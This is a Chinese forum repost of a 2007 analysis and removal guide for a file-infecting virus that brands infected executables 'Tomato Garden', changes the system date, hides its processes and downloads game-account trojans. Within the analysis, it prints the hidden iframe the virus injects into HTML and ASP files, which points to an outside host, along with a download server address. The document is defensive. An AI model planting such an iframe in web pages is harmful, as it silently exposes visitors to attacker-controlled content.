http://www.mmswz.com/bbs1/dispbbs.asp?boardid=13&ID=3653
查找到如此資料,可據此清除病毒。但我覺得最好還是重裝系統了。
關于 修改系統時間 并感染exe成為番茄花園的病毒(rising.exe rising.eve)
2007-05-03 15:40
今天發現此種病毒求助者見多 收到樣本后 利馬測試了一下
該病毒就是前些日子流行的 修改系統時間的病毒之變種
此次變種可謂是集N種破壞性病毒之大成了
主要破壞功能有:1.感染exe 并使得被感染的exe的公司等屬性變為 番茄花園
2.感染html asp 等文件 插入惡意代碼
3.通過雙擊磁盤啟動
4.下載木馬,盜取網游帳號
5.修改注冊表 使系統無法顯示隱藏文件
6.通過hook API 函數 導致任務管理器中 無法看見其進程
分析報告如下:
File: ising.exe
Size: 64775 bytes
File Version: 1.00
MD5: 86311B37D938BB35645E7B092014DD63
SHA1: 47C324A5A691DD31DC0410E51ADBD35065E6C7C3
CRC32: 88ABBD9B
rising.exe 運行后 首先釋放一個rising.eve的文件 然后由rising.exe啟動他
之后 釋放139CA82A.EXE 139CA82A.dll(隨機的8個數字字母組合成的文件名)到系統文件夾
注冊服務139CA82A.EXE
139CA82A.EXE控制winlogon進程 使得139CA82A.dll插入幾乎所有進程
釋放rising.exe 和autorun.inf 到每個分區 使得雙擊磁盤啟動
感染 除系統分區外的某個分區的exe文件 使得其公司名全變為 番茄花園
感染 html asp 等文件 在其后面插入代碼
<iframe src="http://web.yulett.cn/count.htm" width="0" height="0" frameborder="0"></iframe>
修改系統時間 隨機把年份往前調 月,日不變
修改 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue:
值為 0x00000000
導致無法顯示臨時文件
rising.exe 還會hook 多個 API函數 使其進程在任務管理器中隱藏
使用Explorer.exe連接網絡 61.152.92.98:80下載木馬
下載的木馬一般為K117815XXXXX.exe
XXXXX代表隨機
到系統文件夾
由于 每臺機器上下載的木馬的名稱不同 但最后結果相同 所以中間釋放的過程省略
最后 這些木馬運行后分別釋放了如下文件
C:\WINDOWS\system32\buchehuo.exe(創建了服務inetsvr)
C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe
C:\WINDOWS\system32\winsock.exe
臨時文件夾下 釋放upxdnd.exe和upxdnd.dll
解決辦法:
安全模式下(開機后不斷 按F8鍵 然后出來一個高級菜單 選擇第一項 安全模式 進入系統)
首先把系統日期 改回來
然后打開sreng
啟動項目 注冊表 刪除如下項目
<upxdnd><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upxdnd.exe> []
<msccrt><C:\WINDOWS\msccrt.exe> []
<cmdbs><C:\WINDOWS\cmdbs.exe> []
<mppds><C:\WINDOWS\mppds.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<winform><C:\WINDOWS\winform.exe> []
“啟動項目”-“服務”-“Win32服務應用程序”中點“隱藏經認證的微軟項目”,
選中以下項目,點“刪除服務”,再點“設置”,在彈出的框中點“否”:
139CA82A / 139CA82A
Wireless Zero Conflguration / inetsvr
把下面的 代碼拷入記事本中然后另存為1.reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
雙擊1.reg把這個注冊表項導入
然后雙擊我的電腦-工具-文件夾選項-查看-顯示所有文件和文件夾,把“隱藏受保護的系統文件”的勾去掉。
右鍵 點擊C盤 點擊右鍵菜單中的“打開”打開C盤 (千萬不要雙擊)(如圖)
刪除 如下文件
C:\rising.exe
C:\autorun.inf
C:\WINDOWS\system32\buchehuo.exe
C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe
C:\WINDOWS\system32\winsock.exe
C:\WINDOWS\unspapik.txt
C:\WINDOWS\wiasevct.txt
C:\WINDOWS\wiasvctr.txt
C:\WINDOWS\ganran.txt
C:\WINDOWS\system32\139CA82A.DLL(隨機的8個數字字母組合成的文件名)
C:\WINDOWS\system32\139CA82A.EXE(隨機的8個數字字母組合成的文件名)
C:\WINDOWS\system32\K117815XXXXX.exe(XXXXX代表隨機數字)
清空C:\Documents and Settings\用戶名\Local Settings\Temp
右鍵 點擊分別打開系統分區以外的分區 還是點擊右鍵菜單中的“打開” (千萬不要雙擊)
刪除每個分區下面的autorun.inf和rising.exe文件
由于殺毒軟件還不能認出這個病毒所以還是暫時不要點擊 受感染的exe 和html,asp文件
據說ClamWin Free Antivirus這個殺毒軟件能查殺這種病毒,我沒試過,也許行,不妨試試。
這個殺毒軟件是英文版的,沒有中文版。如果使用,記得先把原有的殺毒軟件卸載掉,然后安裝新的。注意應該是在安全模式下查殺病毒。
軟件介紹:ClamWin是一套功能非常優秀的免費防毒軟件。它的體積非常嬌小,不會占用太多計算機資源,不像其它防毒軟件安裝之后會拖累整臺計算機的速度。而且除了強大的文件與電子郵件防護能力之外,它還擁有排程掃描、在線更新病毒碼、及時偵測等功能,和市面上知名防毒軟件比起來一點也不遜色!<script language="javascript" src="../newhuagg/js_ad_show_8.js"></script>
下載頁面:http://www.onlinedown.net/soft/44149.htm
SRENG是指System Repair Engineer,官方網站:http://www.kztechs.com/index1.html
軟件直接下載:http://download.kztechs.com/files/sreng2.zip
介紹和說明:http://www.pxue.com/Html/893.html